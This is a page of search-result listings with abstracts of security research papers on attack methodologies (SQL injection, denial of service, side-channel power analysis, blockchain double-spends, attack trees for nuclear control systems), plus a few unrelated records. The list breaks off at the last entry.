WorldWideScience

Sample records for attack methodology analysis

  1. Attack Methodology Analysis: Emerging Trends in Computer-Based Attack Methodologies and Their Applicability to Control System Networks

    Energy Technology Data Exchange (ETDEWEB)

    Bri Rolston

    2005-06-01

    Threat characterization is a key component in evaluating the threat faced by control systems. Without a thorough understanding of the threat faced by critical infrastructure networks, adequate resources cannot be allocated or directed effectively to the defense of these systems. Traditional methods of threat analysis focus on identifying the capabilities and motivations of a specific attacker, assessing the value the adversary would place on targeted systems, and deploying defenses according to the threat posed by the potential adversary. Too many effective exploits and tools exist and are easily accessible to anyone with access to an Internet connection, minimal technical skills, and a significantly reduced motivational threshold to be able to narrow the field of potential adversaries effectively. Understanding how hackers evaluate new IT security research and incorporate significant new ideas into their own tools provides a means of anticipating how IT systems are most likely to be attacked in the future. This research, Attack Methodology Analysis (AMA), could supply pertinent information on how to detect and stop new types of attacks. Since the exploit methodologies and attack vectors developed in the general Information Technology (IT) arena can be converted for use against control system environments, assessing areas in which cutting edge exploit development and remediation techniques are occurring can provide significance intelligence for control system network exploitation, defense, and a means of assessing threat without identifying specific capabilities of individual opponents. Attack Methodology Analysis begins with the study of what exploit technology and attack methodologies are being developed in the Information Technology (IT) security research community within the black and white hat community. Once a solid understanding of the cutting edge security research is established, emerging trends in attack methodology can be identified and the gap between

  2. Attack methodology Analysis: SQL Injection Attacks and Their Applicability to Control Systems

    Energy Technology Data Exchange (ETDEWEB)

    Bri Rolston

    2005-09-01

    Database applications have become a core component in control systems and their associated record keeping utilities. Traditional security models attempt to secure systems by isolating core software components and concentrating security efforts against threats specific to those computers or software components. Database security within control systems follows these models by using generally independent systems that rely on one another for proper functionality. The high level of reliance between the two systems creates an expanded threat surface. To understand the scope of a threat surface, all segments of the control system, with an emphasis on entry points, must be examined. The communication link between data and decision layers is the primary attack surface for SQL injection. This paper facilitates understanding what SQL injection is and why it is a significant threat to control system environments.

  3. Bluetooth security attacks comparative analysis, attacks, and countermeasures

    CERN Document Server

    Haataja, Keijo; Pasanen, Sanna; Toivanen, Pekka

    2013-01-01

    This overview of Bluetooth security examines network vulnerabilities and offers a comparative analysis of recent security attacks. It also examines related countermeasures and proposes a novel attack that works against all existing Bluetooth versions.

  4. Methodological Naturalism Under Attack | Ruse | South African ...

    African Journals Online (AJOL)

    Recently the Intelligent Design movement has been arguing against methodological naturalism, and in this project they have been joined by the Christian philosopher Alvin Plantinga. In this paper I examine Plantinga\\'s arguments and conclude not only that they are not well taken, but that he does no good service to his ...

  5. An Analysis of Attacks on Blockchain Consensus

    OpenAIRE

    Bissias, George; Levine, Brian Neil; Ozisik, A. Pinar; Andresen, Gavin

    2016-01-01

    We present and validate a novel mathematical model of the blockchain mining process and use it to conduct an economic evaluation of the double-spend attack, which is fundamental to all blockchain systems. Our analysis focuses on the value of transactions that can be secured under a conventional double-spend attack, both with and without a concurrent eclipse attack. Our model quantifies the importance of several factors that determine the attack's success, including confirmation depth, attacke...

  6. Managing Complex Battlespace Environments Using Attack the Network Methodologies

    DEFF Research Database (Denmark)

    Mitchell, Dr. William L.

    This paper examines the last 8 years of development and application of Attack the Network (AtN) intelligence methodologies for creating shared situational understanding of complex battlespace environment and the development of deliberate targeting frameworks. It will present a short history...... of their development, how they are integrated into operational planning through strategies of deliberate targeting for modern operations. The paper will draw experience and case studies from Iraq, Syria, and Afghanistan and will offer some lessons learned as well as insight into the future of these methodologies....... Including their possible application on a national security level for managing longer strategic endeavors....

  7. Attack Graph Construction for Security Events Analysis

    Directory of Open Access Journals (Sweden)

    Andrey Alexeevich Chechulin

    2014-09-01

    Full Text Available The paper is devoted to investigation of the attack graphs construction and analysis task for a network security evaluation and real-time security event processing. Main object of this research is the attack modeling process. The paper contains the description of attack graphs building, modifying and analysis technique as well as overview of implemented prototype for network security analysis based on attack graph approach.

  8. Pragmatism attacking Christianity as weakness – Methodologies of targeting

    Directory of Open Access Journals (Sweden)

    J.J. (Ponti Venter

    2013-08-01

    Full Text Available The central argument is that methods are designed with aims in mind, and are determined by one’s worldview and/or ontology and/or philosophical anthropology and/or views of scholarship. It is possible, and here shown by analysis of the methodology of William James, that obsession with a cause, driven by the elitist belief that my cause is for everybody’s advantage, can take an ideological format (a formalistic ideology, in which case it would show tendencies to polarise. In the case of James the scientistic methodology takes as primary target Christianity’s meekness and kindness as humanitarianly ineffective. But James suffers from the problem of intellectual solipsism: reading Christianity via abstract rationalist theology.

  9. Counteracting Power Analysis Attacks by Masking

    Science.gov (United States)

    Oswald, Elisabeth; Mangard, Stefan

    The publication of power analysis attacks [12] has triggered a lot of research activities. On the one hand these activities have been dedicated toward the development of secure and efficient countermeasures. On the other hand also new and improved attacks have been developed. In fact, there has been a continuous arms race between designers of countermeasures and attackers. This chapter provides a brief overview of the state-of-the art in the arms race in the context of a countermeasure called masking. Masking is a popular countermeasure that has been extensively discussed in the scientific community. Numerous articles have been published that explain different types of masking and that analyze weaknesses of this countermeasure.

  10. Cyberprints: Identifying Cyber Attackers by Feature Analysis

    Science.gov (United States)

    Blakely, Benjamin A.

    2012-01-01

    The problem of attributing cyber attacks is one of increasing importance. Without a solid method of demonstrating the origin of a cyber attack, any attempts to deter would-be cyber attackers are wasted. Existing methods of attribution make unfounded assumptions about the environment in which they will operate: omniscience (the ability to gather,…

  11. Regional Shelter Analysis Methodology

    Energy Technology Data Exchange (ETDEWEB)

    Dillon, Michael B. [Lawrence Livermore National Lab. (LLNL), Livermore, CA (United States); Dennison, Deborah [Lawrence Livermore National Lab. (LLNL), Livermore, CA (United States); Kane, Jave [Lawrence Livermore National Lab. (LLNL), Livermore, CA (United States); Walker, Hoyt [Lawrence Livermore National Lab. (LLNL), Livermore, CA (United States); Miller, Paul [Lawrence Livermore National Lab. (LLNL), Livermore, CA (United States)

    2015-08-01

    The fallout from a nuclear explosion has the potential to injure or kill 100,000 or more people through exposure to external gamma (fallout) radiation. Existing buildings can reduce radiation exposure by placing material between fallout particles and exposed people. Lawrence Livermore National Laboratory was tasked with developing an operationally feasible methodology that could improve fallout casualty estimates. The methodology, called a Regional Shelter Analysis, combines the fallout protection that existing buildings provide civilian populations with the distribution of people in various locations. The Regional Shelter Analysis method allows the consideration of (a) multiple building types and locations within buildings, (b) country specific estimates, (c) population posture (e.g., unwarned vs. minimally warned), and (d) the time of day (e.g., night vs. day). The protection estimates can be combined with fallout predictions (or measurements) to (a) provide a more accurate assessment of exposure and injury and (b) evaluate the effectiveness of various casualty mitigation strategies. This report describes the Regional Shelter Analysis methodology, highlights key operational aspects (including demonstrating that the methodology is compatible with current tools), illustrates how to implement the methodology, and provides suggestions for future work.

  12. Denial of Service Attack Techniques: Analysis, Implementation and Comparison

    Directory of Open Access Journals (Sweden)

    Khaled Elleithy

    2005-02-01

    Full Text Available A denial of service attack (DOS is any type of attack on a networking structure to disable a server from servicing its clients. Attacks range from sending millions of requests to a server in an attempt to slow it down, flooding a server with large packets of invalid data, to sending requests with an invalid or spoofed IP address. In this paper we show the implementation and analysis of three main types of attack: Ping of Death, TCP SYN Flood, and Distributed DOS. The Ping of Death attack will be simulated against a Microsoft Windows 95 computer. The TCP SYN Flood attack will be simulated against a Microsoft Windows 2000 IIS FTP Server. Distributed DOS will be demonstrated by simulating a distribution zombie program that will carry the Ping of Death attack. This paper will demonstrate the potential damage from DOS attacks and analyze the ramifications of the damage.

  13. SMART performance analysis methodology

    International Nuclear Information System (INIS)

    Lim, H. S.; Kim, H. C.; Lee, D. J.

    2001-04-01

    To ensure the required and desired operation over the plant lifetime, the performance analysis for the SMART NSSS design is done by means of the specified analysis methodologies for the performance related design basis events(PRDBE). The PRDBE is an occurrence(event) that shall be accommodated in the design of the plant and whose consequence would be no more severe than normal service effects of the plant equipment. The performance analysis methodology which systematizes the methods and procedures to analyze the PRDBEs is as follows. Based on the operation mode suitable to the characteristics of the SMART NSSS, the corresponding PRDBEs and allowable range of process parameters for these events are deduced. With the developed control logic for each operation mode, the system thermalhydraulics are analyzed for the chosen PRDBEs using the system analysis code. Particularly, because of different system characteristics of SMART from the existing commercial nuclear power plants, the operation mode, PRDBEs, control logic, and analysis code should be consistent with the SMART design. This report presents the categories of the PRDBEs chosen based on each operation mode and the transition among these and the acceptance criteria for each PRDBE. It also includes the analysis methods and procedures for each PRDBE and the concept of the control logic for each operation mode. Therefore this report in which the overall details for SMART performance analysis are specified based on the current SMART design, would be utilized as a guide for the detailed performance analysis

  14. Attack tree based cyber security analysis of nuclear digital instrumentation and control systems

    International Nuclear Information System (INIS)

    Khand, P.A.

    2009-01-01

    To maintain the cyber security, nuclear digital Instrumentation and Control (I and C) systems must be analyzed for security risks because a single security breach due to a cyber attack can cause system failure, which can have catastrophic consequences on the environment and staff of a Nuclear Power Plant (NPP). Attack trees have been widely used to analyze the cyber security of digital systems due to their ability to capture system specific as well as attacker specific details. Therefore, a methodology based on attack trees has been proposed to analyze the cyber security of the systems. The methodology has been applied for the Cyber Security Analysis (CSA) of a Bistable Processor (BP) of a Reactor Protection System (RPS). Threats have been described according to their source. Attack scenarios have been generated using the attack tree and possible counter measures according to the Security Risk Level (SRL) of each scenario have been suggested. Moreover, cyber Security Requirements (SRs) have been elicited, and suitability of the requirements has been checked. (author)

  15. Cyber attack analysis on cyber-physical systems: Detectability, severity, and attenuation strategy

    Science.gov (United States)

    Kwon, Cheolhyeon

    Security of Cyber-Physical Systems (CPS) against malicious cyber attacks is an important yet challenging problem. Since most cyber attacks happen in erratic ways, it is usually intractable to describe and diagnose them systematically. Motivated by such difficulties, this thesis presents a set of theories and algorithms for a cyber-secure architecture of the CPS within the control theoretic perspective. Here, instead of identifying a specific cyber attack model, we are focused on analyzing the system's response during cyber attacks. Firstly, we investigate the detectability of the cyber attacks from the system's behavior under cyber attacks. Specifically, we conduct a study on the vulnerabilities in the CPS's monitoring system against the stealthy cyber attack that is carefully designed to avoid being detected by its detection scheme. After classifying three kinds of cyber attacks according to the attacker's ability to compromise the system, we derive the necessary and sufficient conditions under which such stealthy cyber attacks can be designed to cause the unbounded estimation error while not being detected. Then, the analytical design method of the optimal stealthy cyber attack that maximizes the estimation error is developed. The proposed stealthy cyber attack analysis is demonstrated with illustrative examples on Air Traffic Control (ATC) system and Unmanned Aerial Vehicle (UAV) navigation system applications. Secondly, in an attempt to study the CPSs' vulnerabilities in more detail, we further discuss a methodology to identify potential cyber threats inherent in the given CPSs and quantify the attack severity accordingly. We then develop an analytical algorithm to test the behavior of the CPS under various cyber attack combinations. Compared to a numerical approach, the analytical algorithm enables the prediction of the most effective cyber attack combinations without computing the severity of all possible attack combinations, thereby greatly reducing the

  16. A Strategic Analysis of Information Sharing Among Cyber Attackers

    Directory of Open Access Journals (Sweden)

    Kjell Hausken

    2015-10-01

    Full Text Available We build a game theory model where the market design is such that one firm invests in security to defend against cyber attacks by two hackers. The firm has an asset, which is allocated between the three market participants dependent on their contest success. Each hacker chooses an optimal attack, and they share information with each other about the firm’s vulnerabilities. Each hacker prefers to receive information, but delivering information gives competitive advantage to the other hacker. We find that each hacker’s attack and information sharing are strategic complements while one hacker’s attack and the other hacker’s information sharing are strategic substitutes. As the firm’s unit defense cost increases, the attack is inverse U-shaped and reaches zero, while the firm’s defense and profit decrease, and the hackers’ information sharing and profit increase. The firm’s profit increases in the hackers’ unit cost of attack, while the hackers’ information sharing and profit decrease. Our analysis also reveals the interesting result that the cumulative attack level of the hackers is not affected by the effectiveness of information sharing between them and moreover, is also unaffected by the intensity of joint information sharing. We also find that as the effectiveness of information sharing between hackers increases relative to the investment in attack, the firm’s investment in cyber security defense and profit are constant, the hackers’ investments in attacks decrease, and information sharing levels and hacker profits increase. In contrast, as the intensity of joint information sharing increases, while the firm’s investment in cyber security defense and profit remain constant, the hackers’ investments in attacks increase, and the hackers’ information sharing levels and profits decrease. Increasing the firm’s asset causes all the variables to increase linearly, except information sharing which is constant. We extend

  17. Automatic analysis of attack data from distributed honeypot network

    Science.gov (United States)

    Safarik, Jakub; Voznak, MIroslav; Rezac, Filip; Partila, Pavol; Tomala, Karel

    2013-05-01

    There are many ways of getting real data about malicious activity in a network. One of them relies on masquerading monitoring servers as a production one. These servers are called honeypots and data about attacks on them brings us valuable information about actual attacks and techniques used by hackers. The article describes distributed topology of honeypots, which was developed with a strong orientation on monitoring of IP telephony traffic. IP telephony servers can be easily exposed to various types of attacks, and without protection, this situation can lead to loss of money and other unpleasant consequences. Using a distributed topology with honeypots placed in different geological locations and networks provides more valuable and independent results. With automatic system of gathering information from all honeypots, it is possible to work with all information on one centralized point. Communication between honeypots and centralized data store use secure SSH tunnels and server communicates only with authorized honeypots. The centralized server also automatically analyses data from each honeypot. Results of this analysis and also other statistical data about malicious activity are simply accessible through a built-in web server. All statistical and analysis reports serve as information basis for an algorithm which classifies different types of used VoIP attacks. The web interface then brings a tool for quick comparison and evaluation of actual attacks in all monitored networks. The article describes both, the honeypots nodes in distributed architecture, which monitor suspicious activity, and also methods and algorithms used on the server side for analysis of gathered data.

  18. Trace Chemical Analysis Methodology

    Science.gov (United States)

    1980-04-01

    147 65 Modified DR/2 spectrophotometer face ........... ... 150 66 Colorimetric oil analysis field test kit ......... .. 152 67 Pictorial step...Assisted Pattern Recognitio Perhaps the most promising application of pattern recogntiontechniques for this research effort is the elucidation ".f the...large compartment on the spectrophotomer face . The screwdriver is used to adjust the zero adjust and light ad- just knobs, and the stainless steel

  19. A video-polygraphic analysis of the cataplectic attack

    DEFF Research Database (Denmark)

    Rubboli, G; d'Orsi, G; Zaniboni, A

    2000-01-01

    OBJECTIVES AND METHODS: To perform a video-polygraphic analysis of 11 cataplectic attacks in a 39-year-old narcoleptic patient, correlating clinical manifestations with polygraphic findings. Polygraphic recordings monitored EEG, EMG activity from several cranial, trunk, upper and lower limbs musc...... of REM sleep and neural structures subserving postural control....

  20. Fire safety analysis: methodology

    International Nuclear Information System (INIS)

    Kazarians, M.

    1998-01-01

    From a review of the fires that have occurred in nuclear power plants and the results of fire risk studies that have been completed over the last 17 years, we can conclude that internal fires in nuclear power plants can be an important contributor to plant risk. Methods and data are available to quantify the fire risk. These methods and data have been subjected to a series of reviews and detailed scrutiny and have been applied to a large number of plants. There is no doubt that we do not know everything about fire and its impact on a nuclear power plants. However, this lack of knowledge or uncertainty can be quantified and can be used in the decision making process. In other words, the methods entail uncertainties and limitations that are not insurmountable and there is little or no basis for the results of a fire risk analysis fail to support a decision process

  1. METHODOLOGICAL ELEMENTS OF SITUATIONAL ANALYSIS

    Directory of Open Access Journals (Sweden)

    Tetyana KOVALCHUK

    2016-07-01

    Full Text Available The article deals with the investigation of theoretical and methodological principles of situational analysis. The necessity of situational analysis is proved in modern conditions. The notion “situational analysis” is determined. We have concluded that situational analysis is a continuous system study which purpose is to identify dangerous situation signs, to evaluate comprehensively such signs influenced by a system of objective and subjective factors, to search for motivated targeted actions used to eliminate adverse effects of the exposure of the system to the situation now and in the future and to develop the managerial actions needed to bring the system back to norm. It is developed a methodological approach to the situational analysis, its goal is substantiated, proved the expediency of diagnostic, evaluative and searching functions in the process of situational analysis. The basic methodological elements of the situational analysis are grounded. The substantiation of the principal methodological elements of system analysis will enable the analyst to develop adaptive methods able to take into account the peculiar features of a unique object which is a situation that has emerged in a complex system, to diagnose such situation and subject it to system and in-depth analysis, to identify risks opportunities, to make timely management decisions as required by a particular period.

  2. Performance Improvement of Power Analysis Attacks on AES with Encryption-Related Signals

    Science.gov (United States)

    Lee, You-Seok; Lee, Young-Jun; Han, Dong-Guk; Kim, Ho-Won; Kim, Hyoung-Nam

    A power analysis attack is a well-known side-channel attack but the efficiency of the attack is frequently degraded by the existence of power components, irrelative to the encryption included in signals used for the attack. To enhance the performance of the power analysis attack, we propose a preprocessing method based on extracting encryption-related parts from the measured power signals. Experimental results show that the attacks with the preprocessed signals detect correct keys with much fewer signals, compared to the conventional power analysis attacks.

  3. Nonlinear analysis of NPP safety against the aircraft attack

    International Nuclear Information System (INIS)

    Králik, Juraj; Králik, Juraj

    2016-01-01

    The paper presents the nonlinear probabilistic analysis of the reinforced concrete buildings of nuclear power plant under the aircraft attack. The dynamic load is defined in time on base of the airplane impact simulations considering the real stiffness, masses, direction and velocity of the flight. The dynamic response is calculated in the system ANSYS using the transient nonlinear analysis solution method. The damage of the concrete wall is evaluated in accordance with the standard NDRC considering the spalling, scabbing and perforation effects. The simple and detailed calculations of the wall damage are compared.

  4. Nonlinear analysis of NPP safety against the aircraft attack

    Energy Technology Data Exchange (ETDEWEB)

    Králik, Juraj, E-mail: juraj.kralik@stuba.sk [Faculty of Civil Engineering, STU in Bratislava, Radlinského 11, 813 68 Bratislava (Slovakia); Králik, Juraj, E-mail: kralik@fa.stuba.sk [Faculty of Architecture, STU in Bratislava, Námestie Slobody 19, 812 45 Bratislava (Slovakia)

    2016-06-08

    The paper presents the nonlinear probabilistic analysis of the reinforced concrete buildings of nuclear power plant under the aircraft attack. The dynamic load is defined in time on base of the airplane impact simulations considering the real stiffness, masses, direction and velocity of the flight. The dynamic response is calculated in the system ANSYS using the transient nonlinear analysis solution method. The damage of the concrete wall is evaluated in accordance with the standard NDRC considering the spalling, scabbing and perforation effects. The simple and detailed calculations of the wall damage are compared.

  5. A Proposal for a Methodology to Develop a Cyber-Attack Penetration Test Scenario Including NPPs Safety

    Energy Technology Data Exchange (ETDEWEB)

    Lee, In Hyo [KAIST, Daejeon (Korea, Republic of); Son, Han Seong [Joongbu Univ., Geumsan (Korea, Republic of); Kim, Si Won [Korea Institute of Nuclear Nonproliferation and Control, Daejeon (Korea, Republic of); Kang, Hyun Gook [Rensselaer Polytechnic Institute, Troy (United States)

    2016-10-15

    Penetration test is a method to evaluate the cyber security of NPPs; so, this approach was performed in some studies. Because they focused on vulnerability finding or test bed construction, scenario based approach was not performed. However, to test the cyber security of NPPs, a proper test scenario should be needed. Ahn et al. developed cyber-attack scenarios but those scenarios couldn't be applied in penetration test because they developed the scenarios based on past incidents of NPPs induced by cyber-attack. That is, those scenarios only covered scenarios which were happened before; so, they couldn't cover other various scenarios and couldn't reflect them into a penetration test. In this study, a method to develop a cyber-attack penetration test scenario of NPPs especially focused on safety point of view is suggested. To evaluate the cyber security of NPPs, penetration test can be a possible way. In this study, a method to develop a penetration test scenario was explained. Especially, the goal of hacker was focused on nuclear fuel integrity deterioration. So, in the methodology, Level 1 PSA results were utilized to reflect plant safety into the security. From the PSA results, basic event was post processed and possible cyber-attacks were reviewed with vulnerabilities of digital control system.

  6. A Proposal for a Methodology to Develop a Cyber-Attack Penetration Test Scenario Including NPPs Safety

    International Nuclear Information System (INIS)

    Lee, In Hyo; Son, Han Seong; Kim, Si Won; Kang, Hyun Gook

    2016-01-01

    Penetration test is a method to evaluate the cyber security of NPPs; so, this approach was performed in some studies. Because they focused on vulnerability finding or test bed construction, scenario based approach was not performed. However, to test the cyber security of NPPs, a proper test scenario should be needed. Ahn et al. developed cyber-attack scenarios but those scenarios couldn't be applied in penetration test because they developed the scenarios based on past incidents of NPPs induced by cyber-attack. That is, those scenarios only covered scenarios which were happened before; so, they couldn't cover other various scenarios and couldn't reflect them into a penetration test. In this study, a method to develop a cyber-attack penetration test scenario of NPPs especially focused on safety point of view is suggested. To evaluate the cyber security of NPPs, penetration test can be a possible way. In this study, a method to develop a penetration test scenario was explained. Especially, the goal of hacker was focused on nuclear fuel integrity deterioration. So, in the methodology, Level 1 PSA results were utilized to reflect plant safety into the security. From the PSA results, basic event was post processed and possible cyber-attacks were reviewed with vulnerabilities of digital control system

  7. Stability Analysis of an Advanced Persistent Distributed Denial-of-Service Attack Dynamical Model

    Directory of Open Access Journals (Sweden)

    Chunming Zhang

    2018-01-01

    Full Text Available The advanced persistent distributed denial-of-service (APDDoS attack is a fairly significant threat to cybersecurity. Formulating a mathematical model for accurate prediction of APDDoS attack is important. However, the dynamical model of APDDoS attack has barely been reported. This paper first proposes a novel dynamical model of APDDoS attack to understand the mechanisms of APDDoS attack. Then, the attacked threshold of this model is calculated. The global stability of attack-free and attacked equilibrium are both proved. The influences of the model’s parameters on attacked equilibrium are discussed. Eventually, the main conclusions of the theoretical analysis are examined through computer simulations.

  8. Cyber Attacks During the War on Terrorism: A Predictive Analysis

    National Research Council Canada - National Science Library

    Vatis, Michael

    2001-01-01

    .... Just as the terrorist attacks of September 11, 2001 defied what many thought possible, cyber attacks could escalate in response to United States and allied retaliatory measures against the terrorists...

  9. An Explanation of Nakamoto's Analysis of Double-spend Attacks

    OpenAIRE

    Ozisik, A. Pinar; Levine, Brian Neil

    2017-01-01

    The fundamental attack against blockchain systems is the double-spend attack. In this tutorial, we provide a very detailed explanation of just one section of Satoshi Nakamoto's original paper where the attack's probability of success is stated. We show the derivation of the mathematics relied upon by Nakamoto to create a model of the attack. We also validate the model with a Monte Carlo simulation, and we determine which model component is not perfect.

  10. Quantitative Attack Tree Analysis via Priced Timed Automata

    NARCIS (Netherlands)

    Kumar, Rajesh; Ruijters, Enno Jozef Johannes; Stoelinga, Mariëlle Ida Antoinette; Sankaranarayanan, Sriram; Vicario, Enrico

    The success of a security attack crucially depends on the resources available to an attacker: time, budget, skill level, and risk appetite. Insight in these dependencies and the most vulnerable system parts is key to providing effective counter measures. This paper considers attack trees, one of the

  11. Modeling and Analysis of Information Attack in Computer Networks

    National Research Council Canada - National Science Library

    Pepyne, David

    2003-01-01

    ... (as opposed to physical and other forms of attack) . Information based attacks are attacks that can be carried out from anywhere in the world, while sipping cappuccino at an Internet cafe' or while enjoying the comfort of a living room armchair...

  12. Integrated situational awareness for cyber attack detection, analysis, and mitigation

    Science.gov (United States)

    Cheng, Yi; Sagduyu, Yalin; Deng, Julia; Li, Jason; Liu, Peng

    2012-06-01

    Real-time cyberspace situational awareness is critical for securing and protecting today's enterprise networks from various cyber threats. When a security incident occurs, network administrators and security analysts need to know what exactly has happened in the network, why it happened, and what actions or countermeasures should be taken to quickly mitigate the potential impacts. In this paper, we propose an integrated cyberspace situational awareness system for efficient cyber attack detection, analysis and mitigation in large-scale enterprise networks. Essentially, a cyberspace common operational picture will be developed, which is a multi-layer graphical model and can efficiently capture and represent the statuses, relationships, and interdependencies of various entities and elements within and among different levels of a network. Once shared among authorized users, this cyberspace common operational picture can provide an integrated view of the logical, physical, and cyber domains, and a unique visualization of disparate data sets to support decision makers. In addition, advanced analyses, such as Bayesian Network analysis, will be explored to address the information uncertainty, dynamic and complex cyber attack detection, and optimal impact mitigation issues. All the developed technologies will be further integrated into an automatic software toolkit to achieve near real-time cyberspace situational awareness and impact mitigation in large-scale computer networks.

  13. Methodology of Credit Analysis Development

    Directory of Open Access Journals (Sweden)

    Slađana Neogradi

    2017-12-01

    Full Text Available The subject of research presented in this paper refers to the definition of methodology for the development of credit analysis in companies and its application in lending operations in the Republic of Serbia. With the developing credit market, there is a growing need for a well-developed risk and loss prevention system. In the introduction the process of bank analysis of the loan applicant is presented in order to minimize and manage the credit risk. By examining the subject matter, the process of processing the credit application is described, the procedure of analyzing the financial statements in order to get an insight into the borrower's creditworthiness. In the second part of the paper, the theoretical and methodological framework is presented applied in the concrete company. In the third part, models are presented which banks should use to protect against exposure to risks, i.e. their goal is to reduce losses on loan operations in our country, as well as to adjust to market conditions in an optimal way.

  14. Stakeholder analysis methodologies resource book

    Energy Technology Data Exchange (ETDEWEB)

    Babiuch, W.M.; Farhar, B.C.

    1994-03-01

    Stakeholder analysis allows analysts to identify how parties might be affected by government projects. This process involves identifying the likely impacts of a proposed action and stakeholder groups affected by that action. Additionally, the process involves assessing how these groups might be affected and suggesting measures to mitigate any adverse effects. Evidence suggests that the efficiency and effectiveness of government actions can be increased and adverse social impacts mitigated when officials understand how a proposed action might affect stakeholders. This report discusses how to conduct useful stakeholder analyses for government officials making decisions on energy-efficiency and renewable-energy technologies and their commercialization. It discusses methodological issues that may affect the validity and reliability of findings, including sampling, generalizability, validity, ``uncooperative`` stakeholder groups, using social indicators, and the effect of government regulations. The Appendix contains resource directories and a list of specialists in stakeholder analysis and involvement.

  15. LOFT uncertainty-analysis methodology

    International Nuclear Information System (INIS)

    Lassahn, G.D.

    1983-01-01

    The methodology used for uncertainty analyses of measurements in the Loss-of-Fluid Test (LOFT) nuclear-reactor-safety research program is described and compared with other methodologies established for performing uncertainty analyses

  16. LOFT uncertainty-analysis methodology

    International Nuclear Information System (INIS)

    Lassahn, G.D.

    1983-01-01

    The methodology used for uncertainty analyses of measurements in the Loss-of-Fluid Test (LOFT) nuclear reactor safety research program is described and compared with other methodologies established for performing uncertainty analyses

  17. Analysis of Network Vulnerability Under Joint Node and Link Attacks

    Science.gov (United States)

    Li, Yongcheng; Liu, Shumei; Yu, Yao; Cao, Ting

    2018-03-01

    The security problem of computer network system is becoming more and more serious. The fundamental reason is that there are security vulnerabilities in the network system. Therefore, it’s very important to identify and reduce or eliminate these vulnerabilities before they are attacked. In this paper, we are interested in joint node and link attacks and propose a vulnerability evaluation method based on the overall connectivity of the network to defense this attack. Especially, we analyze the attack cost problem from the attackers’ perspective. The purpose is to find the set of least costs for joint links and nodes, and their deletion will lead to serious network connection damage. The simulation results show that the vulnerable elements obtained from the proposed method are more suitable for the attacking idea of the malicious persons in joint node and link attack. It is easy to find that the proposed method has more realistic protection significance.

  18. Robustness analysis of interdependent networks under multiple-attacking strategies

    Science.gov (United States)

    Gao, Yan-Li; Chen, Shi-Ming; Nie, Sen; Ma, Fei; Guan, Jun-Jie

    2018-04-01

    The robustness of complex networks under attacks largely depends on the structure of a network and the nature of the attacks. Previous research on interdependent networks has focused on two types of initial attack: random attack and degree-based targeted attack. In this paper, a deliberate attack function is proposed, where six kinds of deliberate attacking strategies can be derived by adjusting the tunable parameters. Moreover, the robustness of four types of interdependent networks (BA-BA, ER-ER, BA-ER and ER-BA) with different coupling modes (random, positive and negative correlation) is evaluated under different attacking strategies. Interesting conclusions could be obtained. It can be found that the positive coupling mode can make the vulnerability of the interdependent network to be absolutely dependent on the most vulnerable sub-network under deliberate attacks, whereas random and negative coupling modes make the vulnerability of interdependent network to be mainly dependent on the being attacked sub-network. The robustness of interdependent network will be enhanced with the degree-degree correlation coefficient varying from positive to negative. Therefore, The negative coupling mode is relatively more optimal than others, which can substantially improve the robustness of the ER-ER network and ER-BA network. In terms of the attacking strategies on interdependent networks, the degree information of node is more valuable than the betweenness. In addition, we found a more efficient attacking strategy for each coupled interdependent network and proposed the corresponding protection strategy for suppressing cascading failure. Our results can be very useful for safety design and protection of interdependent networks.

  19. Attack Pattern Analysis Framework for a Multiagent Intrusion Detection System

    Directory of Open Access Journals (Sweden)

    Krzysztof Juszczyszyn

    2008-08-01

    Full Text Available The paper proposes the use of attack pattern ontology and formal framework for network traffic anomalies detection within a distributed multi-agent Intrusion Detection System architecture. Our framework assumes ontology-based attack definition and distributed processing scheme with exchange of communicates between agents. The role of traffic anomalies detection was presented then it has been discussed how some specific values characterizing network communication can be used to detect network anomalies caused by security incidents (worm attack, virus spreading. Finally, it has been defined how to use the proposed techniques in distributed IDS using attack pattern ontology.

  20. k-Nearest Neighbors Algorithm in Profiling Power Analysis Attacks

    Directory of Open Access Journals (Sweden)

    Z. Martinasek

    2016-06-01

    Full Text Available Power analysis presents the typical example of successful attacks against trusted cryptographic devices such as RFID (Radio-Frequency IDentifications and contact smart cards. In recent years, the cryptographic community has explored new approaches in power analysis based on machine learning models such as Support Vector Machine (SVM, RF (Random Forest and Multi-Layer Perceptron (MLP. In this paper, we made an extensive comparison of machine learning algorithms in the power analysis. For this purpose, we implemented a verification program that always chooses the optimal settings of individual machine learning models in order to obtain the best classification accuracy. In our research, we used three datasets, the first containing the power traces of an unprotected AES (Advanced Encryption Standard implementation. The second and third datasets are created independently from public available power traces corresponding to a masked AES implementation (DPA Contest v4. The obtained results revealed some interesting facts, namely, an elementary k-NN (k-Nearest Neighbors algorithm, which has not been commonly used in power analysis yet, shows great application potential in practice.

  1. Quantitative security and safety analysis with attack-fault trees

    NARCIS (Netherlands)

    Kumar, Rajesh; Stoelinga, Mariëlle Ida Antoinette

    2017-01-01

    Cyber physical systems, like power plants, medical devices and data centers have to meet high standards, both in terms of safety (i.e. absence of unintentional failures) and security (i.e. no disruptions due to malicious attacks). This paper presents attack fault trees (AFTs), a formalism that

  2. Anti-discrimination Analysis Using Privacy Attack Strategies

    KAUST Repository

    Ruggieri, Salvatore

    2014-09-15

    Social discrimination discovery from data is an important task to identify illegal and unethical discriminatory patterns towards protected-by-law groups, e.g., ethnic minorities. We deploy privacy attack strategies as tools for discrimination discovery under hard assumptions which have rarely tackled in the literature: indirect discrimination discovery, privacy-aware discrimination discovery, and discrimination data recovery. The intuition comes from the intriguing parallel between the role of the anti-discrimination authority in the three scenarios above and the role of an attacker in private data publishing. We design strategies and algorithms inspired/based on Frèchet bounds attacks, attribute inference attacks, and minimality attacks to the purpose of unveiling hidden discriminatory practices. Experimental results show that they can be effective tools in the hands of anti-discrimination authorities.

  3. A Comprehensive Taxonomy and Analysis of IEEE 802.15.4 Attacks

    Directory of Open Access Journals (Sweden)

    Yasmin M. Amin

    2016-01-01

